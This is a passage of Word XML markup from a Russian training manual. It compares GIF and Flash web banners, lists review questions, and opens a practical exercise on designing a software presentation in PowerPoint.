        <w:t>В общих чертах флэш-технология представляет собой процесс, где на изображение (готовое либо вновь созданное) накладываются разнообразные объекты (кадры): другие рисунки, текст и так далее, которым задаются определенные координаты движения – сценарии. Ход выполнения этого сценария и создает анимационный эффект. От частоты смены кадров для каждого объекта зависит скорость его движения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Есть возможность внедрения некоторых дополнительных настроек для разных объектов при выполнении того тили иного действия (например включение на странице музыки, запуск flash-ролика кликом мыши или изменение цвета, формы, положения при наведении курсора).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Все эти особенности формирования анимации напрямую влияют и на визуальное отображение баннеров gif и flash. Особенности заключаются в следующем:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В связи с ограничением палитры в 256 цветов не все оттенки, заявленные в исходном макете баннера, можно воплотить в этом формате. Если используемого цвета в этой палитре нет, то при сохранении он автоматически будет заменен на наиболее близкий по тону. Это неощутимо при выполнении баннеров с небольшим количеством оттенков и существенно сдерживает фантазию при попытке создать яркий рисунок. Но данный факт актуален лишь для изготовителей баннеров и незначителен для аудитории.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">При попытке оптимизировать изображение (то есть снизить вес баннера), гиф часто </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>покрывается</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> точками – пикселями, которые очень портят всю картину, но при определенном умении можно эти недостатки превратить в достоинства.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>При использовании прозрачных элементов (фона и других) часто имеет место некорректная обработка краев, что создает лишние пиксели, в целом формируя ощущение неопрятности баннера, но при внимательном отношении к процессу баннерного изготовления, эти пиксели можно легко устранить.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В баннерах гиф-формата всего несколько кадров (оптимально – не больше 5-6), так как каждый кадр – это самостоятельное изображение и вес картинки увеличивается пропорционально количеству этих изображений. Сменяются они чаще всего резко – один за другим, так как плавный переход требует увеличения количества кадров.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Кадры в gif-формате могут сменяться с разной частотой: от доли секунды до десятков минут, что можно выгодно использовать для заострения внимания на каком-то определенном моменте (например – рекламном тексте), продляя время его показа и сокращая интервал </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>неважных</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> кадров.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Может развернуть в баннере мини-сценарий с множеством кадров и элементов. По статистике отклик флеш-баннеров на несколько порядков выше, чем баннеров всех других форматов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Качество изображения идеально, не имеет </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>размытостей</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и лишних пикселей, для внедрения различных элементов можно использовать картинки разных форматов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Движение объектов флеш-анимации плавно и максимально приближено к естественному.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Разные части баннера могут вести на разные страницы сайта, что очень удобно, например, для астрологических сайтов с рекламой гороскопов по знакам зодиака.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выглядят flash-баннеры как правило весьма презентабельно, так как вследствие сложности, их разработка осуществляется квалифицированными специалистами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Кроме технических и визуальных отличий gif и flash форматов, существуют ещ</w:t>
      </w:r>
      <w:r w:rsidR="00D70A0A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и такие важнейшие сравнительные моменты, без которых знание о баннерах будет неполным:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Самая главная особенность gif-баннеров в том, что их можно сделать самостоятельно и для этого существует большое количество программного обеспечения (от профессионального до пользовательского) в отличие от флеш-баннеров, изготовление которых требует специальных знаний в области программирования и навыков в работе с </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MacromediaFlash</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В плане веса конечной анимации flash выигрывает перед gif в соотношении к количеству кадров, так как каждый элемент сохраняется в программе один раз и далее меняются только его свойства, без копирования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если баннер предусматривает какое-то особе оформление текста (трехмерность, тень и другие), то возможности флеш в данном вопросе весьма скудны. Тогда как AdobePhotoshop, в котором профессионально рисуются составляющие гиф-анимаци в этом отношении непревзойденный лидер, предоставляющий безграничные возможности оформления текста.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Чтобы качественно выполнить flash-баннер необходимо хотя бы немного уметь рисовать, так как для связки кадров в большинстве случае требуется прорисовка составляющих </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>от руки</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, тогда как gif-баннер возможно полностью выполнить из готовых частей картинок.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">С точки зрения поисковой оптимизации flash-технологии пока проигрывают, а именно: флеш элементы сайтов и баннеры не индексируются большинством поисковых систем, что в некоторых баннерных сетях служит основанием для непринятия к показу этого формата. У гиф-баннеров такой проблемы нет, кроме того при их вставке на страницу есть возможность включения в специальный тег alt </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>альтернативного текста</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, который позволяет дополнительно индексировать сайт не только по содержимому, но и по баннеру.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Флеш позволяет создавать баннеры, уникальные по внешнему виду, которые не так просто </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>украсть</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Если понравившийся gif-баннер можно сохранить как обычный рисунок двумя щелчками мыши, то для сохранения флеш потребуются специальные программы. Но тут есть и обратная сторона: флеш сложнее украсть, но проще изменить без потери качества и выдать за свой. Gif переделать гораздо труднее, так как не имея исходника, все кадры, даже для модификации одной единственной буквы, придется перерисовывать вручную.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Таким образом, истина о том, что </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>вс</w:t>
      </w:r>
      <w:r w:rsidR="00D70A0A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> имеет свои плюсы и минусы</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> актуальна и для мира интернет-баннеров: конечный выбор того или иного формата нужно делать исходя из целей и средств в каждом конкретном случае.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Что такое баннер?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Какие виды баннеров вы знаете?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Как баннер размещается на сайте?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB3FFC" w:rsidRPr="00617AC0" w:rsidRDefault="00DB3FFC" w:rsidP="007755F7">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="209" w:name="_Toc26278749"/>
      <w:bookmarkStart w:id="210" w:name="_Toc507788269"/>
      <w:bookmarkStart w:id="211" w:name="_Toc507788544"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Практическое занятие № </w:t>
      </w:r>
      <w:r w:rsidR="002E7230" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Создание макета презентации </w:t>
      </w:r>
      <w:r w:rsidR="002E7230" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">отраслевого </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>программного обеспечения</w:t>
      </w:r>
      <w:bookmarkEnd w:id="209"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="210"/>
      <w:bookmarkEnd w:id="211"/>
    </w:p>
    <w:p w:rsidR="00D70A0A" w:rsidRPr="00617AC0" w:rsidRDefault="00D70A0A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Цель:</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>формирование навыков разработки презентации программной продукции. Разработка проекта презентации программного обеспечения отраслевой направленности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70A0A" w:rsidRPr="00617AC0" w:rsidRDefault="00D70A0A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Оборудование: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>персональный компьютер, программное обеспечение для работы с графикой.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70A0A" w:rsidRPr="00617AC0" w:rsidRDefault="00D70A0A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Разработать идейную составляющую презентации, выбирать ключевые аспекты программного обеспечения, которые будут освещены в презентации. Провести поиск или создание мультимедийного контента для презентации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137383" w:rsidRPr="00617AC0" w:rsidRDefault="00137383" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Требования к отчету: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Письменный отчет, содержащий макет презентации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00F40D1D" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Включ</w:t>
      </w:r>
      <w:r w:rsidR="00D70A0A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>нная в состав офисного пакета MicrosoftOffice, программа MicrosoftOfficePowerPoint является простым в освоении и очень мощным инструментом создания привлекательных презентаций, отвечающих любым требованиям. С помощью презентации PowerPoint каждый при желании может организовать эффективное сопровождение своего выступления. А поскольку выступать приходится всем, то, определ</w:t>
      </w:r>
      <w:r w:rsidR="00D70A0A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>нно, есть смысл потратить немного времени на освоение этой программы.</w:t>
      </w:r>
      <w:r w:rsidR="007755F7" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Формы проведения презентации PowerPoint могут быть очень разнообразны: выступление, доклад, демонстрация кинофильма или фотографий, выставка или даже театрализованное представление. Презентация может быть простая, схематичная, он может содержать графики и схемы, множество иллюстраций, изобиловать спецэффектами. Все зависит от того, насколько развита фантазия и умения у е</w:t>
      </w:r>
      <w:r w:rsidR="00D70A0A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> создателя.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D70A0A" w:rsidRPr="00617AC0" w:rsidRDefault="00D70A0A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Переходы слайда. Использование анимации. Логотип. Изображать ли на слайде логотип и если да, то где и как? Если цель слайда: </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>чтобы зритель запомнил логотип</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, то его нужно разместить крупно в центре слайда. В случае, когда ваша презентация – лишь одна в ряду презентаций разных фирм, необходимо сделать так, чтобы зритель в любой момент времени мог понять, представитель какой фирмы выступает. Для этого можно разместить логотип справа внизу слайда. Кроме того, для таких мероприятий полезно добавить в слайд контактную информацию: телефон или адрес веб-сайта.</w:t>
      </w:r>
      <w:r w:rsidR="007755F7" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
